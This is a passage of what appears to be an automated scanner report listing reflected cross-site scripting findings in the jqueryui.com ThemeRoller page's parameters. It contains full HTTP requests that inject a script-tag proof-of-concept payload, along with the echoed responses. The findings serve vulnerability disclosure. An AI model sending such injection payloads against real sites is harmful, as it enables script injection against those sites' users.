GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal26e8b"><script>alert(1)</script>2e205dee113&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:23:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120034

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal26e8b"><script>alert(1)</script>2e205dee113&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bg
...[SNIP]...

1.47. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 525e3"><script>alert(1)</script>e1a9bff29ab was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545525e3"><script>alert(1)</script>e1a9bff29ab&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ver=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545525e3"><script>alert(1)</script>e1a9bff29ab&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png
...[SNIP]...

1.48. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2f25"><script>alert(1)</script>177d857462b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222f2f25"><script>alert(1)</script>177d857462b&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222f2f25"><script>alert(1)</script>177d857462b&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacit
...[SNIP]...

1.49. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48bbf"><script>alert(1)</script>65e5ab4225b was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888848bbf"><script>alert(1)</script>65e5ab4225b&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888848bbf"><script>alert(1)</script>65e5ab4225b&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&
...[SNIP]...

1.50. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adb4f"><script>alert(1)</script>981f4e08c10 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203eadb4f"><script>alert(1)</script>981f4e08c10&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203eadb4f"><script>alert(1)</script>981f4e08c10&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

1.51. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f47"><script>alert(1)</script>50caeb8292e was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645a0f47"><script>alert(1)</script>50caeb8292e&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ns-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645a0f47"><script>alert(1)</script>50caeb8292e&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpa
...[SNIP]...

1.52. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50110"><script>alert(1)</script>fa031faa443 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae6450110"><script>alert(1)</script>fa031faa443&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ve=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae6450110"><script>alert(1)</script>fa031faa443&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=
...[SNIP]...

1.53. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7900c"><script>alert(1)</script>cae816e79ac was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=4545457900c"><script>alert(1)</script>cae816e79ac&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpac
...[SNIP]...

1.54. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94042"><script>alert(1)</script>2f54497d769 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?94042"><script>alert(1)</script>2f54497d769=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:16:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&94042"><script>alert(1)</script>2f54497d769=1" type="text/css" media="all" />
...[SNIP]...

1.55. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9e5e"><script>alert(1)</script>f8b31991ec3 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe9e5e"><script>alert(1)</script>f8b31991ec3&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:34:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxe9e5e"><script>alert(1)</script>f8b31991ec3&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.56. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49af1"><script>alert(1)</script>944ac9397d5 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

